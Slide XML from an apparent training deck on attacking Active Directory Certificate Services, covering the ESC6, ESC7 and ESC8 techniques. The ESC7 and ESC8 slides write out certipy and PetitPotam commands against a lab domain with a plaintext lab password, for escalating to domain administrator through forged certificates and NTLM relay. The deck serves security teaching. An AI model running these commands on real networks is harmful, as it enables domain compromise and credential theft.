            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From the security perspective it is necessary to care about the Manage CA (aka “CA Administrator”) and Manage Certificates (aka “Certificate Officer”) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>permissions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If an attacker gains control over a principal that has the Manage CA right over the CA, he can remotely change CA configuration, includes flipping the EDITF_ATTRIBUTESUBJECTALTNAME2 to allow SAN specification in any template and thereby making them vulnerable to the ESC6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>technique.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If an attacker gains control over a principal that has the Manage Certificates right over the CA, he can remotely approve pending certificate requests, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>subvertnig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the "CA certificate manager approval" protection. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8358558" y="2173224"/>
            <a:ext cx="3592820" cy="3447656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1820803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a:t>Syllabus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="837828" y="2060848"/>
            <a:ext cx="9144000" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t>Active </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>Directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>Certification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>Services</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>Why</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>Care</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>Certificate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>templates</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>Abusing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> AD CS </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6598468" y="1772816"/>
            <a:ext cx="4320480" cy="4233548"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4256374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b="1" dirty="0" smtClean="0"/>
              <a:t>ECS7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> - Abuse</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="405781" y="1340768"/>
            <a:ext cx="11377264" cy="4896544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>In order for this technique to work, the user must also have the Manage Certificates access right, and the certificate template </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>SubCA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> must be enabled. With the Manage CA access right, we can fulfill these prerequisites</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Gran grant yourself the Manage Certificates access right by adding your user as a new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>officer:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>certipy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> ca '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>EvilCorp.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>/MCUser:EvilCorp3.@EVILDC1.EvilCorp.local' -ca 'EvilCorp-EVILDC1-CA' -add-officer '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>MCUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="▪"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>SubCA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> template can be enabled on the CA with the -enable-template parameter:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1"/>
              <a:t>certipy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1"/>
              <a:t>ca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1"/>
              <a:t>EvilCorp.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0"/>
              <a:t>/MCUser:EvilCorp3.@EVILDC1.EvilCorp.local' -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1"/>
              <a:t>ca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0"/>
              <a:t> 'EvilCorp-EVILDC1-CA' -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1"/>
              <a:t>enable-template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1"/>
              <a:t>SubCA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Requesting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>a certificate based on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>SubCA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>template:</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1"/>
              <a:t>certipy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1"/>
              <a:t>req</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1"/>
              <a:t>EvilCorp.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0"/>
              <a:t>/MCUser:EvilCorp3.@EVILDC1.EvilCorp.local' -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1"/>
              <a:t>ca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0"/>
              <a:t> 'EvilCorp-EVILDC1-CA' -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1"/>
              <a:t>template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1"/>
              <a:t>SubCA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0"/>
              <a:t>' -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1"/>
              <a:t>alt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1"/>
              <a:t>administrator@EvilCorp.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>With our Manage CA and Manage Certificates, we can then issue the failed certificate request with the ca command and the -issue-request &lt;request ID&gt; parameter:</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1"/>
              <a:t>certipy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1"/>
              <a:t>ca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1"/>
              <a:t>EvilCorp.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0"/>
              <a:t>/MCUser:EvilCorp3.@EVILDC1.EvilCorp.local' -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1"/>
              <a:t>ca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0"/>
              <a:t> 'EvilCorp-EVILDC1-CA' -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1"/>
              <a:t>issue-request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0"/>
              <a:t> 674</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Retrieve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>the issued certificate with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>req</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> command and the -retrieve &lt;request ID&gt; parameter.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1"/>
              <a:t>certipy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1"/>
              <a:t>req</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1"/>
              <a:t>EvilCorp.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0"/>
              <a:t>/MCUser:EvilCorp3.@EVILDC1.EvilCorp.local' -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1"/>
              <a:t>ca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0"/>
              <a:t> 'EvilCorp-EVILDC1-CA' -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1"/>
              <a:t>retrieve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0"/>
              <a:t> 674</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CuadroTexto 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2638028" y="6172620"/>
            <a:ext cx="6329618" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>AD CS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>weaponizing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> the ESC7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>attack (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Tarlogic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3685804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b="1" dirty="0" smtClean="0"/>
              <a:t>ESC8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" smtClean="0"/>
              <a:t>NTLM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Relay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" smtClean="0"/>
              <a:t> to AD CS HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Endpoints</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="405780" y="2321496"/>
            <a:ext cx="7848872" cy="4536504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>AD CS supports server HTTP-based enrollment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metods</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> if additional AD CS server roles are installed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>These HTTP-based certificate enrollment interfaces are all vulnerable to NTLM relay.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1984147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b="1" dirty="0" smtClean="0"/>
              <a:t>ECS8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> - Abuse</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="405781" y="1772816"/>
            <a:ext cx="11377264" cy="5157192"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>relay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t> server:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1"/>
              <a:t>certipy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1"/>
              <a:t>relay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1"/>
              <a:t>ca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" smtClean="0"/>
              <a:t>192.168.217.14</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457063" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>You</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>relay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>PetitPotam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Python3 PetitPotam.py –u  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>TheHoserman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" smtClean="0"/>
              <a:t> –p EvilCorp3. –d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>EvilCorp.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" smtClean="0"/>
              <a:t> –dc-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" smtClean="0"/>
              <a:t> 192.168.217.149</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>SpoolSample</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>ntlmrelayx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="161311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err="1" smtClean="0"/>
              <a:t>Events</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1522412" y="5993147"/>
            <a:ext cx="9144000" cy="576064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Hunting for Active Directory Certificate Services Abuse </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
